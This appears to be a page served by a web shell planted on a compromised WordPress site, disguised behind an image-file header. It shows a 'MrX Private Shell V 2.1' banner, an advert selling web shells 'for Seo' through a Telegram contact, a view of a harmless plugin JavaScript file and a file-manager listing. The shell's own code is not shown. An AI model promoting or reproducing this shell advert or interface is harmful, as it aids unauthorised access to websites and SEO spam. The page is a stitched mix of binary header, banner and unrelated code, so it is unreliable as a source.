����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
// Ability workflows are synthesized per-request by the backend under a
// `wp-ability:` id prefix, so they carry no static workflow definition.
export const isAbilityWorkflow = (id) =>
typeof id === 'string' && id.startsWith('wp-ability:');
// A write to the post the user is looking at won't show until the page reloads.
export const abilityAffectsCurrentPage = (id, input) => {
const isAbility = (window.extAgentData?.wpAbilities ?? []).some((category) =>
category.abilities?.some((ability) => ability.name === id),
);
const postId = window.extAgentData?.context?.postId;
return isAbility && Boolean(postId) && Number(input?.id) === Number(postId);
};
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| abilities.js | File | 663 B | 0644 |
|
| blocks.js | File | 3.01 KB | 0644 |
|
| confetti.js | File | 1.46 KB | 0644 |
|
| domain-suggestion.js | File | 2.5 KB | 0644 |
|
| editor.js | File | 746 B | 0644 |
|
| markdown.js | File | 670 B | 0644 |
|
| media.js | File | 1.48 KB | 0644 |
|
| page-tours.js | File | 723 B | 0644 |
|
| redirects.js | File | 640 B | 0644 |
|
| svg-blocks-scanner.js | File | 2.07 KB | 0644 |
|
| svg-helpers.js | File | 4.91 KB | 0644 |
|
| tool-messages.js | File | 830 B | 0644 |
|
| tour-helpers.js | File | 461 B | 0644 |
|
| util.js | File | 537 B | 0644 |
|
| wp.js | File | 420 B | 0644 |
|